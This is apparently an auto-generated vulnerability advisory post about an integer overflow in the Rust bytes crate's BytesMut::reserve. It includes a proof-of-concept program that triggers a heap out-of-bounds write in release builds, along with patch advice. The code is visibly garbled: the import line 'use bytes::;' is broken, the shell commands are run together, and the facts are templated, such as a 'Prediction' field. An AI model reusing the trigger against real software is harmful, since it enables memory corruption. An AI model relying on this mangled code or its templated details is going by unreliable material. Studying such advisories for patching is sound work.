Listen to this Post
How the CVE Works:
In the `bytes` crate for Rust, the `BytesMut::reserve` function contains a vulnerability in its unique reclaim path. Specifically, when calculating capacity, the condition `if v_capacity >= new_cap + offset` uses an unchecked addition. In release builds where integer overflow wraps (instead of panicking), `new_cap + offset` can overflow usize, causing the condition to incorrectly pass. This leads to `self.cap` being set to a value that exceeds the actual allocated memory capacity. Subsequent methods like `spare_capacity_mut()` rely on this corrupted `cap` value, potentially creating out-of-bounds slices. This results in undefined behavior (UB), such as heap buffer overflows, allowing memory corruption or arbitrary code execution. The issue only manifests in release builds with overflow wraps; debug builds panic due to overflow checks. The vulnerability stems from missing overflow validation in capacity calculations during reallocation.
DailyCVE Form:
Platform: bytes crate
Version: prior to 1.5.1
Vulnerability: Integer Overflow
Severity: Critical
Date: 2024-08-13
Prediction: Patched in 1.5.1
What Undercode Say:
cargo new exploit_poc cd exploit_poc echo 'bytes = "1.5.0"' >> Cargo.toml
use bytes::;
fn main() {
let mut a = BytesMut::from(&b"hello world"[..]);
let mut b = a.split_off(5);
drop(a);
b.reserve(usize::MAX - 6);
b.put_u8(b'h');
}
cargo run --release
How Exploit:
Exploit triggers overflow via `reserve(usize::MAX – 6)` causing corrupted capacity and out-of-bounds write in put_u8, leading to UB or HBO.
Protection from this CVE
Update to bytes 1.5.1; enable overflow panic checks in release builds.
Impact:
Memory corruption, arbitrary code execution, denial-of-service.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

